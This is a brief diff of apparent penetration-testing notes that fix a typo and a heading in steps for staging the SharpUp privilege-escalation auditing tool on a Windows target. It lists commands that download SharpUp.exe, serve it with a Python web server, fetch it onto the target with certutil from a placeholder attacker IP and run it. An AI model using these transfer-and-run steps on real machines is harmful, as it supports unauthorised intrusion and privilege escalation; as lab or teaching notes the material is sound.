Skip to content

 wget https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/SharpUp.exe

-2. Host the Powershell Script Using Python:
+2. Host the executable using Python:

 python3 -m http.server 8000

-certutil -urlcache -f http://[IP-ADRESS]:8000/SharpUp.exe SharpUp.exe
+certutil -urlcache -f http://[IP-ADDRESS]:8000/SharpUp.exe SharpUp.exe

 .\SharpUp.exe audit